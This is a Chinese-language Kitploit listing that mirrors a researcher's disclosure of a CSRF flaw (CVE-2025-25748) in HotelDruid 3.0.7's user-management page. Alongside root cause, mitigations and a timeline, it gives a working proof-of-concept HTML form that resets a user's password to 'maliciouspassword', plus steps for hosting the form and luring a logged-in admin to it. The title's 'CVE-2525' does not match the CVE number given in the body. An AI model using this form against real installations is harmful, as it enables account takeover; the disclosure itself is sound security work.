Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2525-25748-Cross-Site-Request-Forgery-CSRF-Vulnerability-in-HotelDruid-3.0.7 — HotelDruid 3.0.7 中的跨站请求伪造(CSRF)漏洞(CVE-2025-25748) | Kitploit
工具/GitHubGitHub/huyvo2910/cve-2525-25748-cross-site-request-forgery-csrf-vulnerability-in-hoteldruid-3.0.7
漏洞分析Web应用程序漏洞利用Web安全渗透测试论文与研究学习与教育
GitHubhuyvo2910/cve-2525-25748-cross-site-request-forgery-csrf-vulnerability-in-hoteldruid-3.0.7

CVE-2525-25748-Cross-Site-Request-Forgery-CSRF-Vulnerability-in-HotelDruid-3.0.7

HotelDruid 3.0.7 中的跨站请求伪造(CSRF)漏洞(CVE-2025-25748)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1年前尚未审核

CVE-2025-25748-跨站请求伪造(CSRF)漏洞-HotelDruid-3.0.7

描述

HotelDruid 3.0.7 的 gestione_utenti.php 端点存在跨站请求伪造(CSRF)漏洞,由于缺乏来源(Origin)或引用(Referer)验证以及缺少 CSRF 令牌,攻击者可利用此漏洞代表已认证用户执行未经授权的操作(例如修改用户密码)。


影响

  • 未授权密码修改: 攻击者可覆盖用户密码,导致完全接管账户。
  • 会话骑乘: 攻击者可利用受害者的活动会话进行未授权的管理更改。
  • 数据泄露风险: 如果管理员账户被入侵,敏感的用户和运营数据可能会被暴露或篡改。

此漏洞使所有用户账户(包括管理员账户)面临未经用户同意而被未授权更改的风险。


概念验证(PoC)

PoC HTML 表单

以下恶意表单展示了攻击者如何强制已登录的管理员将用户 ID 2 的密码更改为 maliciouspassword:

root@kitploit:~
<form method="POST" action="http://localhost/hoteldruid/gestione_utenti.php">    <input type="hidden" name="anno" value="2025">    <input type="hidden" name="id_sessione" value="20250118062407or6tODG42f79QvMA2429">    <input type="hidden" name="modifica_pass" value="SI">    <input type="hidden" name="id_utente_pass" value="2">    <input type="hidden" name="prima_pass" value="maliciouspassword">    <input type="hidden" name="seconda_pass" value="maliciouspassword">    <button type="submit">Submit</button></form>

托管与发动攻击

将以上代码保存为 csrf_attack.html。

使用 Python 在攻击者控制的服务器上托管:

root@kitploit:~
python3 -m http.server 8080

引导受害者访问:

root@kitploit:~
http://<attacker-ip>:8080/csrf_attack.html

提交后,该表单将请求发送至 HotelDruid,利用受害者的活动会话将用户 ID 2 的密码更改为 maliciouspassword。


分析

背景

HotelDruid 是一款广泛使用的开源物业管理系统,适用于酒店和度假租赁。作为一个具有用户管理管理控制功能的多用户系统,确保只有授权用户才能修改账户凭据对于整体系统安全至关重要。

CSRF 漏洞利用了服务器对用户浏览器会话的信任。如果受害者已登录并访问恶意页面,该页面可以静默地利用受害者的活动会话向易受攻击的应用程序提交未经授权的请求。在 HotelDruid 中,关键操作(如更改用户密码)缺乏 CSRF 防御,这使得攻击者能够在用户仅访问恶意链接的情况下完全攻破账户。


漏洞详情

受影响端点

  • gestione_utenti.php

受影响参数

  • modifica_pass
  • id_utente_pass
  • prima_pass
  • seconda_pass

根源

  • 表单中未包含反 CSRF 令牌,服务器端也未进行验证。
  • 未对 Origin 或 Referer 头部进行验证。
  • 应用程序盲目信任传入的 POST 请求,包括来自外部站点的请求。

利用流程

  1. 攻击者准备一个恶意 HTML 表单,其中预填隐藏字段,目标为 gestione_utenti.php。
  2. 攻击者诱骗已登录的 HotelDruid 用户(例如管理员)访问该恶意页面。
  3. 访问后,表单自动提交,发送一个有效请求,将用户密码更改为攻击者控制的密码。
  4. 受害者的会话被用于授权该请求,受害者对此毫不知情且未经其同意。

影响

  • 账户接管: 任何用户(包括管理员账户)的密码均可被更改而用户不知情,攻击者从而获得完全访问权限。
  • 权限提升: 攻击者可以先攻破低级别用户,然后利用管理操作进行权限提升。
  • 数据完整性风险: 攻击者可以修改用户账户,可能锁定合法用户或创建后门访问。

缓解/补丁

对开发者的建议

反 CSRF 令牌

  • 为所有改变状态的表单和请求实施并强制使用唯一的反 CSRF 令牌。
  • 在处理请求之前,在服务器端验证令牌。

引用/来源头部验证

  • 验证 Referer 和 Origin 头部,确保请求来自受信任的来源。

限制通过 GET 请求进行敏感操作

  • 密码更改等类似操作应仅允许通过 POST 请求。
  • 避免在 URL 中传递敏感会话数据(如 id_sessione)。

会话管理增强

  • 登录后重新生成会话令牌。
  • 在可行的情况下将会话令牌绑定到 IP 地址或浏览器指纹。

用户通知

  • 当发生密码更改等敏感操作时,通知用户(通过电子邮件或应用内提醒)。

时间线与致谢

  • 发现日期: 2025 年 1 月 16 日
  • 厂商通知: 2025 年 1 月 17 日
  • MITRE CVE 分配: CVE-2025-25748,2025 年 2 月 27 日
  • 公开披露: 2025 年 3 月 7 日
  • 研究人员: Huy Vo(安全研究员)
下载工具